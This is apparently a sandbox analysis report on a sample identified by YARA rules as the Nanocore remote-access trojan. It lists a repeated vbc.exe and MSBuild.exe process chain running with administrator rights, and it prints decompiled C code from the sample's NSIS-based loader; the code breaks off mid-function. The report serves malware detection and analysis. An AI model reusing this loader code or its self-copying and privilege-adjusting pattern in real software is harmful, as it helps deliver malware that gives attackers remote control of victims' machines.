Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: MSBuild.exe PID: 620 Parent PID: 1840

General

Start time:	14:55:48
Start date:	03/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x360000
File size:	261944 bytes
MD5 hash:	7FB523211C53D4AB3213874451A928AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: vbc.exe PID: 1192 Parent PID: 1840

General

Start time:	14:55:53
Start date:	03/05/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	599035 bytes
MD5 hash:	669DD51D521BE84D6F2C45012115FC5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Chronological Activities

Analysis Process: MSBuild.exe PID: 592 Parent PID: 1192

General

Start time:	14:55:55
Start date:	03/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x10a0000
File size:	261944 bytes
MD5 hash:	7FB523211C53D4AB3213874451A928AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: vbc.exe PID: 2320 Parent PID: 1192

General

Start time:	14:56:00
Start date:	03/05/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	599035 bytes
MD5 hash:	669DD51D521BE84D6F2C45012115FC5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Chronological Activities

Analysis Process: MSBuild.exe PID: 2300 Parent PID: 2320

General

Start time:	14:56:01
Start date:	03/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x10a0000
File size:	261944 bytes
MD5 hash:	7FB523211C53D4AB3213874451A928AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Chronological Activities

Analysis Process: vbc.exe PID: 1888 Parent PID: 2320

General

Start time:	14:56:07
Start date:	03/05/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	599035 bytes
MD5 hash:	669DD51D521BE84D6F2C45012115FC5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Chronological Activities

Analysis Process: MSBuild.exe PID: 2104 Parent PID: 1888

General

Start time:	14:56:08
Start date:	03/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x11f0000
File size:	261944 bytes
MD5 hash:	7FB523211C53D4AB3213874451A928AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Chronological Activities

Analysis Process: vbc.exe PID: 2252 Parent PID: 1888

General

Start time:	14:56:13
Start date:	03/05/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	599035 bytes
MD5 hash:	669DD51D521BE84D6F2C45012115FC5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Chronological Activities

Analysis Process: MSBuild.exe PID: 2384 Parent PID: 2252

General

Start time:	14:56:15
Start date:	03/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x11f0000
File size:	261944 bytes
MD5 hash:	7FB523211C53D4AB3213874451A928AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Chronological Activities

Analysis Process: vbc.exe PID: 2644 Parent PID: 2252

General

Start time:	14:56:20
Start date:	03/05/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	599035 bytes
MD5 hash:	669DD51D521BE84D6F2C45012115FC5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Chronological Activities

Analysis Process: MSBuild.exe PID: 2448 Parent PID: 2644

General

Start time:	14:56:22
Start date:	03/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x13c0000
File size:	261944 bytes
MD5 hash:	7FB523211C53D4AB3213874451A928AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Chronological Activities

Analysis Process: vbc.exe PID: 2688 Parent PID: 2644

General

Start time:	14:56:26
Start date:	03/05/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	599035 bytes
MD5 hash:	669DD51D521BE84D6F2C45012115FC5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Chronological Activities

Analysis Process: MSBuild.exe PID: 2544 Parent PID: 2688

General

Start time:	14:56:28
Start date:	03/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x13c0000
File size:	261944 bytes
MD5 hash:	7FB523211C53D4AB3213874451A928AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Chronological Activities

Analysis Process: vbc.exe PID: 2404 Parent PID: 2688

General

Start time:	14:56:33
Start date:	03/05/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	599035 bytes
MD5 hash:	669DD51D521BE84D6F2C45012115FC5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Chronological Activities

Analysis Process: MSBuild.exe PID: 2324 Parent PID: 2404

General

Start time:	14:56:35
Start date:	03/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x13c0000
File size:	261944 bytes
MD5 hash:	7FB523211C53D4AB3213874451A928AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Chronological Activities

Analysis Process: vbc.exe PID: 2444 Parent PID: 2404

General

Start time:	14:56:41
Start date:	03/05/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	599035 bytes
MD5 hash:	669DD51D521BE84D6F2C45012115FC5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Chronological Activities

Analysis Process: MSBuild.exe PID: 2472 Parent PID: 2444

General

Start time:	14:56:43
Start date:	03/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0xd0000
File size:	261944 bytes
MD5 hash:	7FB523211C53D4AB3213874451A928AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: vbc.exe PID: 2460 Parent PID: 2444

General

Start time:	14:56:47
Start date:	03/05/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	599035 bytes
MD5 hash:	669DD51D521BE84D6F2C45012115FC5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2780 Parent PID: 2500 vbc.exeCOMMON

Executed Functions

Function 00403461, Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366
stringcomfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				char _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42474c = _t42;
				if(_t42 != 6) {
					_t119 = E00406631(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E004065C3(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E00406631(0xb);
				 *0x424744 = E00406631(9);
				_t47 = E00406631(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42474f =  *0x42474f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x424818 = _t47;
				SHGetFileInfoA(0x41fd10, 0, _t164 + 0x38, 0x160, 0); // executed
				E00406228(0x423f40, "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Users\\Public\\vbc.exe\" ";
				E00406228(_t160, _t51);
				 *0x424740 = 0x400000;
				_t53 = _t160;
				if("\"C:\\Users\\Public\\vbc.exe\" " == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t53 =  &M0042A001;
				}
				_t55 = CharNextA(E00405BEB(_t53,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t55;
				while(1) {
					_t122 =  *_t55;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405BEB(_t55,  *(_t164 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E00406228("C:\\Users\\Albus\\AppData\\Local\\Temp",  &(_t55[2]));
										L30:
										_t157 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157);
										_t59 = E00403430(_t172);
										_t173 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EF1(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												E00403949();
												__imp__OleUninitialize();
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x4247f4;
													if( *0x4247f4 == 0) {
														L67:
														_t63 =  *0x42480c;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E00406631(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405944( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x424760 == 0) {
												L42:
												 *0x42480c =  *0x42480c | 0xffffffff;
												 *(_t164 + 0x18) = E00403A3B( *0x42480c);
												goto L43;
											}
											_t153 = E00405BEB(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E004058AF(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Users\\Public";
													if(lstrcmpiA(_t157, "C:\\Users\\Public") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E00405892();
														} else {
															E00405815();
														}
														SetCurrentDirectoryA(_t157);
														_t189 = "C:\\Users\\Albus\\AppData\\Local\\Temp"; // 0x43
														if(_t189 == 0) {
															E00406228("C:\\Users\\Albus\\AppData\\Local\\Temp", _t162);
														}
														E00406228(0x425000,  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														 *0x425400 = "A";
														do {
															E004062BB(0, 0x41f910, _t157, 0x41f910,  *((intOrPtr*)( *0x424754 + 0x120)));
															DeleteFileA(0x41f910);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\Public\\vbc.exe", 0x41f910, 1) != 0) {
																E00406007(_t137, 0x41f910, 0);
																E004062BB(0, 0x41f910, _t157, 0x41f910,  *((intOrPtr*)( *0x424754 + 0x124)));
																_t94 = E004058C7(0x41f910);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															 *0x425400 =  *0x425400 + 1;
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E00406007(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E00405CAE(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E00406228("C:\\Users\\Albus\\AppData\\Local\\Temp", _t154);
												E00406228("C:\\Users\\Albus\\AppData\\Local\\Temp", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E00403430(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E00403430(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t55[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t55[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x424800 = 1;
								goto L20;
							}
